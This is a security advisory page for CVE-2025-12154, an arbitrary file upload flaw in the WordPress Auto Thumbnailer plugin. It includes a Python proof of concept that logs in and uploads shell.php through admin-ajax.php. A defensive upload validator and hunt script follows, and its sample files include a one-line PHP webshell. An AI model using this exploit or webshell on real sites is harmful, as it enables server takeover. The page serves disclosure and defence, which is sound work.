Security Vulnerability Report
CVE-2025-12154 CVSS 8.8 HIGH

Published: 2025-12-05 06:16:06
Last Modified: 2026-04-15 00:35:42

Description

The Auto Thumbnailer plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the uploadThumb() function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

Two points matter for triage. First, the Contributor role does not hold the upload_files capability in a default WordPress install (Author and above do), so the plugin's handler exposes an upload path to a role that core's media library would refuse. Second, the weakness is CWE-434: the handler does not restrict extension or MIME type, so a file such as shell.php written into a web-served directory (for example wp-content/uploads/) is executed by the PHP handler on the next request to it. Any site running version 1.0 or earlier with untrusted users at Contributor level or above should be treated as exposed.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Weakness: CWE-434 (Unrestricted Upload of File with Dangerous Type)

Configurations (Affected Products)

No CPE configuration data available (NVD status: Deferred).

Affected: WordPress Auto Thumbnailer plugin, all versions up to and including 1.0 (from the description above).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-12154 PoC - Auto Thumbnailer Arbitrary File Upload
# Target: WordPress site with Auto Thumbnailer plugin <= 1.0
#
# The AJAX action name and nonce below are placeholders: the advisory names only the
# vulnerable function (uploadThumb()), not the admin-ajax action that reaches it or how
# its nonce is issued. Take both from the plugin source on the target before use.
AJAX_ACTION = 'upload_thumb'   # placeholder, not confirmed by the advisory
AJAX_NONCE = 'exploit_nonce'   # placeholder, replace with a nonce issued to the logged-in user


def exploit_upload(target_url, username, password, webshell_path):
    """
    Exploit arbitrary file upload vulnerability in Auto Thumbnailer plugin

    Args:
        target_url: Base URL of the WordPress site
        username: WordPress username with Contributor role or higher
        password: WordPress password
        webshell_path: Path to the webshell file to upload
    """
    session = requests.Session()

    # Step 1: Login to WordPress. A GET first is required: wp-login.php sets
    # wordpress_test_cookie, and the form POST with testcookie=1 is rejected without it.
    login_url = f"{target_url}/wp-login.php"
    session.get(login_url)
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    session.post(login_url, data=login_data)
    # The auth cookie is named wordpress_logged_in_<hash>, so match on the prefix
    if not any(name.startswith('wordpress_logged_in') for name in session.cookies.keys()):
        print("[-] Login failed!")
        return False
    print("[+] Login successful!")

    # Step 2: Upload the file via the admin-ajax action that reaches uploadThumb()
    upload_url = f"{target_url}/wp-admin/admin-ajax.php"
    with open(webshell_path, 'rb') as f:
        webshell_content = f.read()
    files = {
        'file': ('shell.php', webshell_content, 'application/x-php')
    }
    data = {
        'action': AJAX_ACTION,
        'nonce': AJAX_NONCE
    }
    response = session.post(upload_url, files=files, data=data)
    # admin-ajax.php answers 400 "0" for an unknown action and 403 "-1" for a failed
    # nonce check; a 200 only means the handler ran, so show the body and confirm the
    # file is actually reachable under wp-content/uploads/.
    if response.status_code == 200:
        print("[+] File upload request sent!")
        print(f"[*] Response: {response.text[:200]}")
        print(f"[*] Check {target_url}/wp-content/uploads/ for uploaded shell")
        return True
    print(f"[-] Upload request failed: HTTP {response.status_code} {response.text[:200]}")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <webshell_path>")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    shell = sys.argv[4]
    exploit_upload(target, user, pwd, shell)
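The description attributes the bug to missing file type validation, and the PoC ends by telling the operator to look in wp-content/uploads/ for the result. The block below is an added example written for this page; it is not code from the plugin, from Wordfence or from the PoC author. It implements the validation an upload handler like uploadThumb() should have performed (image extension allowlist, rejection of executable extensions anywhere in the name, magic-byte check, PHP open-tag sniff) and then reuses the same check as a hunt over an uploads tree, flagging every file that would not have passed. The allowlist, the sample files and the directory layout are constructed for the demo; a real hunt would point hunt_uploads() at the site's wp-content/uploads/ directory.

```python
import os
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

# Constructed allowlist for a thumbnail handler: extension -> accepted leading bytes.
# Assumption: only raster images are legitimate input to a thumbnailer.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "webp": (b"RIFF",),  # RIFF container; "WEBP" must follow at offset 8
}

# Extensions the PHP handler (or a permissive .htaccess) would execute.
DANGEROUS_EXT = {"php", "phtml", "php3", "php4", "php5", "php7", "phar", "inc", "htaccess"}

# "<?php", "<?=" or a bare short tag followed by whitespace; "<?xml" is not matched.
PHP_TAG = re.compile(rb"<\?(?:php\b|=|\s)", re.IGNORECASE)


def classify_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for a would-be thumbnail upload.

    The checks are ordered cheapest first; every rejection reason is returned so
    a caller can log it."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    ext = parts[-1]
    # Reject an executable extension anywhere after the base name: shell.php.jpg
    # is served as PHP under Apache AddHandler configurations, and .htaccess has
    # an empty base name.
    if any(p in DANGEROUS_EXT for p in parts[1:]):
        return False, f"disallowed extension in {os.path.basename(filename)}"
    if ext not in IMAGE_MAGIC:
        return False, f"extension .{ext} not in image allowlist"
    if not any(content.startswith(magic) for magic in IMAGE_MAGIC[ext]):
        return False, f"content does not match .{ext} magic bytes"
    if ext == "webp" and content[8:12] != b"WEBP":
        return False, "RIFF container is not WEBP"
    # A valid image header followed by PHP is a polyglot; reject it too.
    if PHP_TAG.search(content):
        return False, "embedded PHP open tag"
    return True, "ok"


def hunt_uploads(uploads_dir: Path) -> List[Tuple[str, str]]:
    """Walk an uploads tree and return (relative path, reason) for every file that
    classify_upload() would have refused, i.e. files that should not be there."""
    findings = []
    for path in sorted(uploads_dir.rglob("*")):
        if not path.is_file():
            continue
        accepted, reason = classify_upload(path.name, path.read_bytes())
        if not accepted:
            findings.append((path.relative_to(uploads_dir).as_posix(), reason))
    return findings


def build_sample_uploads() -> Path:
    """Constructed sample tree (not real evidence): one legitimate PNG, a plain PHP
    shell, a PNG/PHP double-extension polyglot and a .jpg carrying GIF bytes."""
    root = Path(tempfile.mkdtemp(prefix="wp-uploads-"))
    month = root / "2025" / "12"
    month.mkdir(parents=True)
    (month / "thumb.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    (month / "shell.php").write_bytes(b"<?php system($_GET['c']); ?>")
    (month / "polyglot.png.php").write_bytes(b"\x89PNG\r\n\x1a\n<?php echo 1; ?>")
    (month / "logo.jpg").write_bytes(b"GIF89a" + b"\x00" * 16)
    return root


if __name__ == "__main__":
    for rel_path, why in hunt_uploads(build_sample_uploads()):
        print(f"[!] {rel_path}: {why}")
```

The hunt deliberately reads whole files rather than a header prefix so that PHP appended after a valid image (the polyglot case) is still caught; on a large uploads tree, restrict the walk by modification time around the advisory's publication date to keep it fast.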

References

https://wordpress.org/plugins/auto-thumbnailer/
https://www.wordfence.com/threat-intel/vulnerabilities/id/d7c98191-bf17-4e94-88cc-ad385b1fe97d?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12154", "sourceIdentifier": "[email protected]", "published": "2025-12-05T06:16:05.877", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Auto Thumbnailer plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the uploadThumb() function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}, {"lang": "es", "value": "El plugin Auto Thumbnailer para WordPress es vulnerable a cargas de archivos arbitrarios debido a la falta de validación del tipo de archivo en la función uploadThumb() en todas las versiones hasta la 1.0, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador y superior, carguen archivos arbitrarios en el servidor del sitio afectado, lo que puede hacer posible la ejecución remota de código."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://wordpress.org/plugins/auto-thumbnailer/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d7c98191-bf17-4e94-88cc-ad385b1fe97d?source=cve", "source": "[email protected]"}]}}